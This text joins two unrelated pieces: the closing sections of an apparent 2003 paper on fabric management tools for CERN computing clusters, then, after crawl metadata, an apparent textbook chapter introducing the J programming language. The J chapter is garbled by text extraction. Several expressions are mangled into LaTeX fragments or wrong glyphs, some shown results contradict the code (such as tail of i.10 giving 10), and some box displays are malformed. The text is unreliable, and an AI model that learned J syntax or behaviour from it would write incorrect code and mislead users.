ready and used on CERN production clusters since more than a year - The TCP based proprietary protocol exists as prototype. More testing and functionality needed to be ready for production use Central services - Repository server exists with both flatfiles and Oracle database. The latter is currently being evaluated for production use at CERN. Support for MySQL is planned for later in 2003 - Alarm display: still in early prototype phase. Repository API for local and global consumers: - C library implementation of API (same for local and global consumers) - Bindings for other languages can be generated directly from the WSDL. 4. FAULT TOLERANCE SUBSYSTEM 4.1. Design The components of the fault tolerance subsystem and how they interoperate with the monitoring subsystem are shown in Figure 4. Central to the fault tolerance system is the rule based correlation engine allowing users/administrators to define set of rules that are executed by the system. A rule determines exception conditions and maps them into actions to be executed. Arbitrarily complex exception conditions can be expressed using a simple but efficient language. The language offers the basic numerical and Boolean operations as well as string comparison. The language also provides a possibility to collect all kinds of data from a computing node, which then enters into the expression as a variable. A web-based XML editor can be used for creating the rules. The XML file defining the rule is copy to the nodes where it is parsed by a local fault tolerance daemon consisting of a decision unit and an actuator agent. The decision unit parses the configured rules and is responsible for using the monitoring repository API to call the monitoring system to subscribe to all metrics needed by the rule. The monitoring system notifies the decision unit whenever there is a new measurement of the metrics. The decision unit then re-evaluates the rule. The actuator agent is called if an exception condition expressed by the rule is met. The actuator agent takes the output from the decision unit and determines which actuator to call. An actuator can be any executable command (binary or script) that is available on the node. The actuator agent launches the actuator and reports back as a normal metric the return status of the actuator to the monitoring system. This feedback to the monitoring system is important. It allows tracing actions and it allows the correlation engine to be state less. Retry loops can be created by defining a rule that takes the actuator return status metric as input. The feedback also allows for escalation of exception that cannot be solved locally. 4.2. Status The fault tolerance subsystem is not yet ready for production deployment but a prototype was demonstrated working together with the fabric monitoring system at EU review in February 2003. The setup included a Web-based rule editor and central rule repository (MySQL) for managing the rules. On the local nodes a local fault tolerance daemon was deployed that • Automatically subscribed to monitoring metrics specified by the rules • Launched the associated actuators when the correlation evaluates to an exception • Reported back to the monitoring system the recovery actions taken and their status Only local correlations (detection of daemon dead followed by an automatic restart) were demonstrated at the review. Global (inter-node) correlations will be supported later. 5. INSTALLATION MANAGEMENT SUBSYSTEM The installation management system ([3]) provides scalable solutions for the automated from scratch installation, (re-)configuration and software package distribution and management of large clusters. 5.1. Automated Installation Infrastructure The AII (Automated Installation Infrastructure) subsystem [4] provides tools for the management of standard vendor installation servers. This includes the configuration of network related information, like the DHCP tables and the network bootstrap protocol (e.g. PXE for Intel/Linux and OpenBoot for Solaris). Also, the node specific installation setup rules (KickStart for Linux respective JumpStart for Solaris) have to be generated. The AII obtains its configuration either from the CDB (via the CCM), or from site specific network databases. 5.2. Node Configuration Management The NCM (Node Configuration Management) subsystem [5] provides a framework for adapting the actual configuration of a node to its desired configuration, as it is described in the node’s profile inside the CDB. Plug-in software modules called 'components' are responsible for the configuration of local services (e.g. network, sendmail, NFS), analogously to LCFG 'objects' [6] or SUE 'features' [7]. For this, they can read CDB configuration information via the CCM, and create/update/delete local service configuration files in order to match the CDB configuration description. Components register which configuration entries or subtrees it is interested in, and get notified in case of changes. Each component contains the knowledge for translating the CDB configuration into each local service's specific config file syntax. A component may also require notifying a service about a configuration change (e.g. by running a 'restart' or 'reload' method in a SysV init script). The NCM subsystem contains the following modules: - **cdispd**: The Configuration Dispatch Daemon (cdispd) monitors the node configuration profile by polling the CCM. In case of changes in the configuration profile, the cdispd will invoke the affected components via the ncd. - **ncd**: The Node Configuration Deployer (ncd) is the framework and front-end for executing the configuration components. The ncd can be executed manually, via cron, or via the cdispd. It takes care of which takes care of configuration locking and inter-component dependency ordering prior to executing components sequentially. - **Component support libraries**: Libraries for recurring system management tasks (system information, interfaces to system services, file editing), log file handling, interface to Monitoring, etc. ### 5.3. Software package management and distribution The Software Package Management and Distribution (SPM) subsystem [8] is responsible for managing and storing software packages, and the distribution and installation of these packages on client nodes. The SPM subsystem contains the following modules: - **Software Repository**: The Software Repository (SWRep) module allows site administrators and package maintainers to store and manage software packages (like RPM or PKG packages) subject to authentication and authorization using ACL's. The packages themselves are accessible to the clients via standard protocols including HTTP, FTP, or using a shared file system. It is possible to have multiple (replicated or independent) Software Repository instances for a given fabric, allowing for load balancing, and also private per-department repositories. The replication of repositories can be done with standard tools like rsync. - **SPMA**: The Software Package Manager Agent (SPMA) runs on the target nodes. It reads a local configuration file with the list of desired packages, compares it with the currently installed packages, computes the necessary install/deinstall/upgrade operations, and invokes the system packager (e.g. rpm\(^1\) on Linux, pkgadd/del on Solaris) with the right operation transaction set. - **SPM component**: The information on which packages are to be deployed on which nodes (desired or target configuration), and which packages are available on which repositories can be kept in the CDB. The SPM component fits into the NCM framework described above. It retrieves the list of packages to be installed for the current node from the CDB via the CCM, creates with this information a local configuration file for the SPMA, and launches the SPMA. Typically, the SPMA is used for managing all packages on a node. This is useful for nodes which are under full control of the fabric management system. However, for add-on installations or desktop systems, the SPMA can be run in 'light' mode, taking care of a subset of packages only, according to configurable policies. For performance and scalability issues, the SPMA can use a local cache where packages can be stored ahead. This way, peak loads on software repository servers can be avoided during upgrades of large farms, but keeping consistency across the upgraded nodes. Also, the default transport protocol is set to HTTP for its scalability and low overhead. ### 5.4. Status The architectural design of the AII and NCM subsystems has finished; the detailed design and implementation is progressing, and a first prototype version of these subsystems will be available at the end of the summer. A integrated solution, including components for configuring the most common system services, is expected to be available by the end of September. A first production version of the SPM subsystem is being deployed on CERN's central batch and interactive services. ### 6. CONFIGURATION MANAGEMENT SUBSYSTEM #### 6.1. Design The Configuration Management subsystem consists of modules shown in the Figure 6. The configuration information is stored centrally in the Configuration Database, CDB. The configuration of a particular node is --- \(^1\) Since 'rpm' on Linux does not accept multiple simultaneous operation types, we developed a new front-end called 'rpm' (for transactional rpm) capable to handle multiple operations on multiple packages in a single transaction. Configuration Information may be also accessed centrally through some other means e.g. the SQL or LDAP queries. This functionality is provided by the Server Modules. The configuration information is structured in a tree format, and expressed with the High Level Description Language called Pan [9]. Pan mainly consists of statements to set some value to a configuration parameter identified by its path in the configuration information tree. Pan features include other statements like "include" (very similar to cpp's #include directive) or "delete" that removes a part of the configuration information tree. The grouping of statements into templates allows the sharing of common information and provides simple inheritance mechanism. Pan contains a very flexible typing mechanism. It has several built-in types (such as "boolean", "string", "long" and "double") and allows compound types to be built on top of these. Once the type of the element is known, the compiler makes sure that only values of the right type are assigned to it. To have even greater control on the information generated by the compiler, one can attach validation code to a type or to a configuration path. The validation code is represented in a simple yet powerful data manipulation language which is a subset of Pan and syntactically similar to C or Perl. The Configuration Database [10] stores two forms of configuration information. One is High Level Description expressed in the Pan language. The other is the Low Level Description [11] and is expressed in XML. The system administrators can edit the High Level Description, either through Command Line Interface (CLI) or Graphic User Interface (GUI). There is also possibility of having some scripting layer on top of the Configuration Database. The Low Level Description (one XML file per machine) is always generated using the Pan compiler. The database works in a transactional way. It performs validation of the configuration information. Once the validation and compilation process is accomplished successfully, the changes introduced by the user are stored in the database and visible to its clients. Configuration Database also provides mechanisms for versioning and it maintains the history of the changes of the configuration information. The database itself includes a scalable distribution mechanism for the XML files based on HTTP, and the possibility of adding any number of back-ends (such as LDAP or SQL) - the Server Modules, to support various query patterns on the information stored. It should scale to millions of configuration parameters. Configuration Cache Manager runs on every node and caches the XML machine configuration (to support disconnected operations). The access to the information is provided through a Node View Access API [12] that hides the details such as the XML schema used. The Manager may poll the Configuration Database for the configuration information. It also receives UDP notification sent by the database if the machine's configuration is changed. ### 6.2. Status The Configuration Management subsystem is implemented except for the Command Line Interface and the Server Modules. Most of the components are in production versions. It has been being deployed for the LCG1 using the "PanGUIn" GUI. In parallel, the whole system is being consolidated. The issues of scalability and security are being studied and addressed. Currently the Server Modules for the XML replication and the SQL access are developed. ### 7. CONCLUSIONS AND OUTLOOK In the first two years of the project the work was focused into surveying the existing solutions for automated... management of large clusters, getting the architecture and design right, and implementing prototypes of the different subsystems. At the time of writing this paper, stable prototypes exist for all subsystems; some of them are already deployed at CERN and/or the EDG project testbed, and are presently being evaluated for production purposes: - System monitoring: 1000 nodes being monitored, with 20 different MSA configurations (form 80 to 120 metrics per node), sending data to a central measurement repository. - Configuration management: CDB in production status, holding site-wide, cluster and node specific configurations for 550 clients, totaling 1200 templates. - Installation management and maintenance: First pilot of Software Repository and SPMA being deployed on CERN Computer Centre for the central CERN production (batch & interactive) services. All the nodes declared in the CDB are (re)installed using the SPMA, accessing packages from a replicated and load-balanced HTTP-based SWRep repository server cluster. The idea is go grow up to ~ 1.5K nodes at the end of 2003. Most of the changes required to move from the prototyping stage to production quality tools are the result of the testing and evaluation period. No fundamental flaw has been found in the architecture so far. However, simulating real production use has shown to be the only efficient way of finding development bugs or functionality enhancements. Computing Centers have also very high requirements on stability and reliability that can only be tested in a real environment. The users have been involved throughout the whole design and development process, but it is now when their collaboration is becoming crucial. The plans from now till the end of the project are focused on two areas. Firstly the work on general aspects as security, scalability, usability, graphical user interfaces, etc needs to be completed. Secondly, the different fabric subsystems need to be “glued” together to build a consistent set of fabric management tools. Each subsystem has been implemented as a modular set of tools, which could be used independently according to the user needs. The tools will work together to provide all the functionality needed to automatically manage medium size to very large computing fabrics, as stated in the initial objectives. 8. ACKNOWLEDGMENTS The authors wish to thank the EU and our national funding agencies for their support of this work. 9. REFERENCES
{"Source-Url": "http://www.slac.stanford.edu/econf/C0303241/proc/papers/MODT004.PDF", "len_cl100k_base": 5390, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 24141, "total-output-tokens": 6332, "length": "2e12", "weborganizer": {"__label__adult": 0.0003044605255126953, "__label__art_design": 0.0008225440979003906, "__label__crime_law": 0.00031065940856933594, "__label__education_jobs": 0.00103759765625, "__label__entertainment": 0.00010764598846435548, "__label__fashion_beauty": 0.00018656253814697263, "__label__finance_business": 0.0004703998565673828, "__label__food_dining": 0.000324249267578125, "__label__games": 0.0003800392150878906, "__label__hardware": 0.005680084228515625, "__label__health": 0.0004687309265136719, "__label__history": 0.0004973411560058594, "__label__home_hobbies": 0.0001971721649169922, "__label__industrial": 0.0015010833740234375, "__label__literature": 0.00021791458129882812, "__label__politics": 0.0002846717834472656, "__label__religion": 0.0005121231079101562, "__label__science_tech": 0.330322265625, "__label__social_life": 9.900331497192384e-05, "__label__software": 0.0304412841796875, "__label__software_dev": 0.62451171875, "__label__sports_fitness": 0.00022542476654052737, "__label__transportation": 0.0006647109985351562, "__label__travel": 0.00023484230041503904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29092, 0.02554]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29092, 0.30256]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29092, 0.86885]], "google_gemma-3-12b-it_contains_pii": [[0, 3917, false], [3917, 8114, null], [8114, 11738, null], [11738, 14388, null], [14388, 16371, null], [16371, 21406, null], [21406, 25056, null], [25056, 29092, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3917, true], [3917, 8114, null], [8114, 11738, null], [11738, 14388, null], [14388, 16371, null], [16371, 21406, null], [21406, 25056, null], [25056, 29092, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29092, null]], "pdf_page_numbers": [[0, 3917, 1], [3917, 8114, 2], [8114, 11738, 3], [11738, 14388, 4], [14388, 16371, 5], [16371, 21406, 6], [21406, 25056, 7], [25056, 29092, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29092, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
b183e3615a690af0326efa79856365cc6b119484
In this chapter, we present the basic concepts of J. We introduce some of J’s built-in functions and show how they can be applied to data objects. The principles presented in this book are supported by examples. The reader therefore is strongly advised to download and install a copy of the J interpreter from www.jsoftware.com. 2.1 Data Objects Here, we give a brief introduction to data objects in J. Data objects come in a number of forms: scalars, vectors, matrices and higher-dimensional arrays. Scalars are single numbers (or characters); the examples below show the values assigned to variables names: ``` i := 3 NB. integer j := _1 NB. negative integer x := 1.5983 NB. real y := 22r7 NB. rational z := 2j3 NB. complex number m := _ NB. infinity n := __ NB. negative infinity v := 5x2 NB. exponential notation 5 * exp(2) ``` Note that negative numbers are denoted by an underscore (_) preceding the value rather than by a hyphen (-). An underscore on its own denotes infinity ∞, and two underscores denotes negative infinity −∞. Variables are not limited to numerical values: ``` c := ’hello world’ ``` Variables can be evaluated by entering the variable name at the command prompt: Scalars are called *atoms* in J or *0-cells*, and vectors are called lists or *1-cells*. The sequence of numbers below is an example of a list and is assigned to a variable name: ```j dvc =: 1 1 2 3 5 8 13 21 34 55 ``` The `i.` verb generates ascending integers from zero \( n - 1 \), where \( n \) is the value of the argument. For example: ```j z1 =: i.10 NB. generate list 0 to 9 ``` The associated verb `i:` generates integers from \( -n \) to \( n \), thus: ```j z2 =: i:5 NB. generate list -5 to 5 ``` Matrices (tables in J) are 2-cell objects. Here is a table of complex numbers: ```j j =: (i.6) j./ (i.6) ``` Matrices (of ascending integers) can be generated with the `i.` verb. The example below shows a \( 3 \times 2 \) matrix: ```j i. 2 3 NB. generate a matrix ``` Higher-dimensional arrays are also possible. The expression below generates an array of reciprocals with ascending denominators: This 3-cell data object is a three-dimensional array with three columns, four rows and two planes, where the planes are delimited by a blank line. Scalars/atoms, vector/lists and matrices/tables are just special instances of arrays with respective ranks zero, one and two. Table 2.1 shows the J terms for data objects and their mathematical equivalents. Throughout this book, we will use the J and mathematical terms interchangeably. <table> <thead> <tr> <th>J term</th> <th>Mathematical term</th> <th>Dimension</th> <th>Object type</th> </tr> </thead> <tbody> <tr> <td>atom</td> <td>scalar</td> <td>0</td> <td>0-cell</td> </tr> <tr> <td>list</td> <td>vector</td> <td>1</td> <td>1-cell</td> </tr> <tr> <td>table</td> <td>matrix</td> <td>2</td> <td>2-cell</td> </tr> <tr> <td>array</td> <td>array</td> <td>n</td> <td>n-cell</td> </tr> </tbody> </table> Table 2.1. J versus mathematical terms 2.2 J Verbs In J, functions are called verbs. J has a number of built-in verbs/functions; for example, the basic arithmetic operators are: +, −, *, % and ^, which are addition, subtraction, multiplication, division and power functions, respectively. Here are some (trivial) examples: ``` 2 + 3 NB. addition 5 2 − 3 NB. subtraction −1 7 * 3 NB. multiplication 21 2 % 7 NB. division: "%" is used instead of "/" 0.285714 ``` In J, there is a subtle (but important) difference between _1 and -1. The term _1 is the value minus one, whereas -1 is the negation function applied to (positive) one. Arithmetic can also be performed on lists of numbers: ``` 2 % 0 1 2 3 4 NB. divide scalar by a vector _2 1 0.666667 0.5 3 2 1 0 - 0 1 2 3 NB. pointwise vector subtraction 3 1 _1 _3 ``` The example above demonstrates how J deals with divide by zero. Any division by zero returns a _ (∞). In addition to the basic arithmetic operators, J has many more primitives, for example: ``` +: 1 2 3 4 NB. double 2 4 6 8 -: 1 2 3 4 NB. halve 0.5 1 1.5 2 %: 1 4 9 16 NB. square root 1 2 3 4 *: 1 2 3 4 NB. squared 1 4 9 16 >: _1 0 1 2 3 NB. increment 0 1 2 3 4 <: _1 0 1 2 3 NB. decrement _2 _1 0 1 2 ``` Verbs are denoted by either a single character (such as addition +) or a pair of characters (such as double +:). Some primitives do use alphabetic characters, for example, the integers verb i. and complex verb j., which were introduced above. ### 2.3 Monadic and Dyadic functions Each verb in J possesses the property of *valance*, which relates to how many arguments a verb takes. *Monadic* verbs take one argument (and are therefore of valance one), whereas *dyadic* verbs take two arguments (valance two). Monadic verbs are expressed in the form: \( f \ x \). The (single) argument \( x \) is passed to the right of the function \( f \). In functional notation, this is equivalent to \( f(x) \). In its dyadic form, \( f \) takes two arguments and are passed to the function on either side: \( y \ f \ x \), equivalent to \( f(y, x) \) in functional notation. J’s verb symbols are overloaded; that is, they implement two separate (often related, but sometimes inverse) functions depending upon the valance. We use the % primitive to demonstrate. We have already seen it used in its dyadic form as a division operator. However, in its monadic form, % performs a reciprocal operation: \[ \begin{align*} % 2 & \quad \text{NB. used monadically is reciprocal} \\ & \quad 0.5 \\ 3 \% 2 & \quad \text{NB. used dyadically is division} \\ & \quad 1.5 \end{align*} \] Let us look at a few more examples. The monadic expression \( \sim x \) is the exponential function of \( x: e^x \). The dyad \( y \sim x \), however, performs \( y \) to the power \( x \), that is: \( y^x \). To illustrate: \[ \begin{align*} ^e 0 & \quad 1 \quad 2 \quad 3 \quad \text{NB. used monadically is } \exp(x) \\ 1 & \quad 2.71828 \quad 7.38906 \quad 20.0855 \\ 2 \quad ^e 0 & \quad 1 \quad 2 \quad 3 \quad \text{NB. used dyadically is } y^x \\ 1 & \quad 2 \quad 4 \quad 8 \end{align*} \] Used monadically <: performs a decrement function: \[ \begin{align*} \textcolor{blue}{\text{::< 1 2 3 4 5 6}} \\ & \quad 0 \quad 1 \quad 2 \quad 3 \quad 4 \quad 5 \end{align*} \] However as a dyad it performs less-than-or-equal-to: \[ \begin{align*} 4 \textcolor{blue}{\text{::< 1 2 3 4 5 6}} \\ & \quad 0 \quad 0 \quad 0 \quad 1 \quad 1 \quad 1 \end{align*} \] 2.4 Positional Parameters The meaning of a positional parameter is given by virtue of its relative position in a sequence of parameters. J does not really have a concept of positional parameters; however, we can pass positional parameters to functions as an ordered list of arguments. In this section, we introduce verbs for argument processing: left [ and right ]. These verbs return the left and right arguments, respectively: \[ \begin{align*} 2 \left[ 3 \\ 2 \\ 2 \right] 3 \\ 3 \end{align*} \] Similarly >: performs increment and greater-than-or-equal-to. The *right* provides a convenient means of displaying the result of an assignment: ``` x =: i.10 0 1 2 3 4 5 6 7 8 9 ``` The *left* verb can be used to execute two expressions on one line: ``` x =: i.10 { n =: 2 NB. assign x and n x ^ n 0 1 4 9 16 25 36 49 64 81 ``` The verbs *head* {. and *tail* {: return the first element and the last element of a list: ``` {. x 0 {: x 10 ``` Conversely, *drop* {. and *curtail* }: remove the head and tail of a list and return the remaining elements: ``` }. x 2 4 6 8 10 ): x 0 2 4 6 8 ``` The *from* verb {. is used to extract a particular element (or elements) within a list, by passing the index of the required element in the list as a left argument: ``` 0 { x 0 2 { x 4 3 1 5 { x 6 2 10 0 0 0 1 2 2 2 3 3 4 5 5 5 5 { x 0 0 0 2 4 4 4 6 8 10 10 10 10 ``` Lists can be combined with *raze* ,. and *laminate* ,: in columns or rows, respectively. The J expressions below yield two matrices $m_1$ and $m_2$: ``` ]m1 =: 1 2 3 4 ,. 5 6 7 8 1 5 2 6 3 7 4 8 ``` We cover higher-dimensional objects in more detail in Section 2.6. Here, we look briefly at applying the \textit{from} verb to matrices: \begin{verbatim} ] m2 =: 1 2 3 4 , : 5 6 7 8 1 2 3 4 5 6 7 8 \end{verbatim} Here, \textit{from} returns the third row of \textit{m}1 in the first example and the second row of \textit{m}2 in the second example. If we wish to reference an individual scalar element, then we need to use \textit{from} twice: \begin{verbatim} 0 { 1 { m2 5 \end{verbatim} In order to reference a column, we need to be able to change the \textit{rank} of the verbs. The concept of rank will be covered in the next section. Two data objects can be concatenated with \textit{ravel} (,,), for example: \begin{verbatim} v1 =: 1 2 3 4 v2 =: 5 6 ] v3 =: v1 , v2 1 2 3 4 5 6 0 3 4 5 { v3 1 4 5 6 \end{verbatim} This creates a single list of eight elements (\textit{v}3). There is no separation between the two original lists \textit{v}1 and \textit{v}2. If we wished to retain the separation of the two initial lists, then we combine them with the \textit{link} verb ;, for example: \begin{verbatim} ] v4 =: v1 ; v2 -------+-+ |1 2 3 4|5 6| -------+-+ \end{verbatim} The lists are “boxed” and therefore exist as separate data objects. We can reference the two lists in the usual way: \begin{verbatim} 0 { v4 -------+ |1 2 3 4| -------+ \end{verbatim} The data object returned is a single element; we cannot get at any of the individual scalar elements in the box: ``` 1 { 0 { v4 |index error | 1 {0{v4 ``` Use `open >` to unbox the object: ``` > 0 { v4 NB. unbox v1 1 2 3 4 1 { > 0 { v4 2 ``` There is a corresponding inverse function, namely the monadic verb `box <`, which “groups” elements: ``` <1 2 3 4 +-------+ | 1234 | +-------+ ``` Using the primitives described above, we define a number of functions for referencing positional parameters. These functions will be used a great deal in developing functions later in this book. Note that a couple of conjunctions are used here (`&` and `@`) will be covered later, in Section 3.1.4 ``` lhs0 =: [\ NB. all left arguments lhs1 =: 0&{@lhs0 NB. 1st left argument lhs2 =: 1&{@lhs0 NB. 2nd left argument lhs3 =: 2&{@lhs0 NB. 3rd left argument rhs0 =: ]\ NB. all right arguments rhs1 =: 0&.@rhs0 NB. 1st right argument rhs2 =: 1&.@rhs0 NB. 2nd right argument rhs3 =: 2&.@rhs0 NB. 3rd right argument ``` The functions `lhs0` and `rhs0` evaluate the left and right arguments, respectively. The other functions are programmed to return positional parameters, thus `lhs1` (respectively `rhs1`) returns the first positional parameter on the left-hand side (respectively right-hand side). We illustrate the use of positional parameters with the following example. Consider the classical M/M/1 queuing model given in Equation (1.6). We can write a function that takes the parameters $\mu$ and $\rho$ as left-hand arguments and right-hand arguments, respectively: ``` mm1 =: %@lhs1 % 1:-rhs0 3 mm1 0.5 0.6 0.7 0.8 0.9 0.666667 0.833333 1.11111 1.66667 3.33333 ``` 2.5 Adverbs The (default) behaviour of verbs can be altered by combining them with *adverbs*. We have already encountered an adverb with the summation function `/`. The application of `/` causes + to be inserted between the elements of the argument, in this case, the individual (scalar) numbers in the list. ``` +/ i.6 ``` ``` 0 + 1 + 2 + 3 + 4 + 5 NB. as we’ve seen before ``` ``` +/ i.6 ``` ``` 0 + 1 + 2 + 3 + 4 + 5 NB. and is equivalent to this ``` The dyadic case results in a matrix of the sum of the elements of the left argument to each element of the right argument. ``` (i.6) +/ (i.6) ``` ``` 0 1 2 3 4 5 1 2 3 4 5 6 2 3 4 5 6 7 3 4 5 6 7 8 4 5 6 7 8 9 5 6 7 8 9 10 ``` The *prefix* adverb \ causes the data object to be divided into sublists that increase in size from the left; the associated verb is then applied to each sublist in turn. We can see how the sublist is generated using the *box* verb: ``` <\ i.5 ``` ``` +-----------+---------+-------+-----+---+-+ |0 1 2 3 4 5|1 2 3 4 5|2 3 4 5|3 4 5|4 5|5| +-----------+---------+-------+-----+---+-+ ``` A cumulative summation function can be implemented using the *insert* and *prefix* verbs: ``` +/\ i.6 ``` ``` 0 1 3 6 10 15 ``` This function will be useful later on when we wish to convert interval traffic arrival processes to cumulative traffic arrival processes. The *suffix* \. operates on decreasing sublists of the argument: ``` <\. i.6 ``` ``` +-----------+---------+-------+-----+---+-+ |0 1 2 3 4 5|1 2 3 4 5|2 3 4 5|3 4 5|4 5|5| +-----------+---------+-------+-----+---+-+ ``` ``` The monadic reflexive adverb \( \sim \) duplicates the right-hand argument as the left-hand argument. So the J expression \( f \sim x \) is equivalent to \( x f x \), for example: \[ +/ \sim i.6 \quad \text{NB. } (i.6) +/ (i.6) \] 0 1 2 3 4 5 1 2 3 4 5 6 2 3 4 5 6 7 3 4 5 6 7 8 4 5 6 7 8 9 5 6 7 8 9 10 The \( \sim \) verb also has a dyadic form (passive). This means that the left and right-hand side arguments are swapped; that is, \( y f x \) becomes \( x f y \), as an illustration: \[ 2 \% \sim i.6 \quad \text{NB. equivalent to } (i.6) \% 2 \] 0 0.5 1 1.5 2 2.5 ### 2.6 Rank, Shape and Arrays Arithmetic can be performed between a scalar and a list or between two lists, for example: \[ 2 * 0 1 2 3 4 5 \] 0 2 4 6 8 10 0 1 2 3 4 5 + 1 2 3 4 5 6 1 3 5 7 9 11 Notice that the lists have to be the same length; otherwise the J interpreter throws a "length error": \[ 9 8 - 0 1 2 3 4 5 \] |length error | | 9 8 - 0 1 2 3 4 5 | J can also perform arithmetic on higher-dimensional objects. In this section, we introduce arrays as well as the concepts of rank and shape. Rank is synonymous with dimensionality; thus a two-dimensional array has rank two, a three-dimensional array has rank three. Verbs have rank attributes which are used to determine at what rank level they should operate on data objects. We will explore this later. First, let us consider at how we can define array objects by using the dyadic shape verb \( \$: \) \[ ]x2 =: 2 3 \$: i.6 \] 0 1 2 3 4 5 As we have already seen, we could have defined this particular array, simply by: \[ \begin{array}{cccc} i & 2 & 3 \\ 0 & 1 & 2 \\ 3 & 4 & 5 \end{array} \] This is fine for defining an array with ascending integers (as returned by \( \text{i.} \)), but if we wanted to form an array using some arbitrary list of values, then we need to use \( \$ \). We will continue to use the \( \$ \) method, although we acknowledge that it is not necessary, as the data objects used in these examples are merely ascending integers. The shape is specified by the left arguments of \( \$ \) and can be confirmed using the \( \$ \) in its monadic form: \[ \$ \; x2 \\ 2 \; 3 \] The data object \( x2 \) is a \((3 \times 2)\) two-dimensional array, or, in J terms, a rank two object (of shape \( 2 \; 3 \)). Arithmetic can be applied in the usual way. This example shows the product of a scalar and an array: \[ 2 \; \ast \; x2 \\ 0 \; 2 \; 4 \\ 6 \; 8 \; 10 \] Here we have the addition of two arrays (of the same shape): \[ x2 \; + \; (2 \; 3 \; \$ \; 1 \; 2 \; 3 \; 4 \; 5 \; 6) \\ 1 \; 3 \; 5 \\ 7 \; 9 \; 11 \] J can handle this: \[ 2 \; 3 \; + \; x2 \\ 2 \; 3 \; 4 \\ 6 \; 7 \; 8 \] But apparently not this: \[ 1 \; 2 \; 3 \; + \; x2 \\ \mid \text{length error} \\ \mid \; 1 \; 2 \; 3 \; + \; x2 \] J of course, can handle this, but we need to understand more about the rank control conjunction \( * \) which will be covered in Section 3.1 below. Consider a \( 3 \times 2 \times 2 \) array: $x_3$ is a three-dimensional array and, therefore, of rank three. J displays this array arranged into two planes of two rows and three columns, where the planes are delimited by the blank line. We can confirm the structure of $x_3$ by using $\$ $ as a monad, where it performs a shape-of function: $$x_3$$ 2 2 3 Now, let us apply summation to $x_3$: $$+/x_3$$ 6 8 10 12 14 16 Here, the individual elements of the two planes have been summed; that is: \[ \begin{bmatrix} 0 & 1 & 2 \\ 3 & 4 & 5 \end{bmatrix} \begin{bmatrix} 6 & 7 & 8 \\ 9 & 10 & 11 \end{bmatrix} = \begin{bmatrix} 0 + 6 & 1 + 7 & 2 + 8 \\ 3 + 9 & 4 + 10 & 5 + 11 \end{bmatrix} = \begin{bmatrix} 6 & 8 & 10 \\ 12 & 14 & 16 \end{bmatrix} \] It is important to understand why $+/ \ $ sums across the planes rather down the columns or along the rows. First consider this example: $$%/x_3$$ _ 1 0.5 0.333333 0.25 0.2 0.166667 0.142857 0.125 0.111111 0.1 0.0909091 Aside from the difference between the arithmetic functions $+/ \ $ and $\% \ $ perform, they also operate on the argument in a different way. Where as $+/ \ $ operated on the two planes, here $\% \ $ is applied to each individual scalar element. The difference in the behaviour of the two verbs $+/ \ $ and $\% \ $ is governed by their respective rank attributes. We can query the rank attribute of verbs with the expressions below: $$%/b.$$ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 Three numbers are returned. The first number (reading left to right) is the rank of the monad form of the verb. The second and third numbers are the ranks of the left and right arguments of the dyadic form of the verb. When a verb performs an operation on an object, it determines the rank of the cell elements on which it will operate. It does this by either using the rank (dimension) of the object or the rank attribute of the verbs, whichever is smaller. In the example above, \(x3\) has a rank of three, and the (monadic) rank attribute of \(\%\) is zero. So \(\%\) is applied to \(x3\) at rank zero. Thus it is applied to each 0-cell (scalar) element. However, the rank attribute of \(+/\) is infinite, and, therefore, the rank, at which the summation is performed, is three. Thus, \(+/\) applies to each 3-cell element of \(x3\), resulting in a summation across the planes. Consider another example. We define the data object \(x0\) as a list of six elements and then apply the fork \((\$, \#)\) which (simultaneously) returns the shape and the number of elements. ```plaintext ]x0 =: i.6 0 1 2 3 4 5 ($;#) x0 +-+-+- |6|6| +-+- ``` Here both \# and \$ return six as \(x0\) consists of six atoms, or 0-cell elements. Now try this on \(x2\) which was declared earlier: ```plaintext ($;#) x2 +-+-+-+-+- |2 3|2| +-+-+-+- ``` The resultant shape is as expected but the number of elements returned by \textit{tally} may not be. To make sense of the result, we need to know what “elements” the \textit{tally} is counting: 0-cell, 1-cell or 2-cell? This depends upon the rank at which \# is operating. The data object \(x2\) is clearly rank two. The command-line below shows us that the (monadic) verb attribute of \# is infinite: ```plaintext # b. 0 NB. monadic rank attribute is infinite _ 1 _ ``` In this particular case we may ignore the dyadic rank attributes. Tally (\#) is applied to the 2-cell elements which are the rows. Consider this example: ```plaintext ]x1 =: 1 6 $ i.6 0 1 2 3 4 5 ($;#) x1 +-+-+-+-+- ``` Data objects $x_0$ and $x_1$ may appear the same but they are actually different by virtue of their shape and rank. $x_1$ is a $(6 \times 1)$ two-dimensional array, and, therefore, of rank two (with shape $1 \times 6$). It also has only one element (one row) because # still operates on the 2-cell elements. In contrast, $x_0$ is a list of six 0-cell elements. In actual fact, $x_0$ is equivalent to $y_0$, defined below: ```j ]y0 =: 6$i.6 0 1 2 3 4 5 ``` $y_0$ and $x_0$ are equivalent ```j x0 = y0 NB. x0 and y0 are equivalent 1 1 1 1 1 1 ``` $x_0$ and $x_1$, as we know, are not ```j |length error | x0 =x1 ``` The difference between $x_0$ and $x_1$ becomes more apparent when we perform some arithmetic operation on 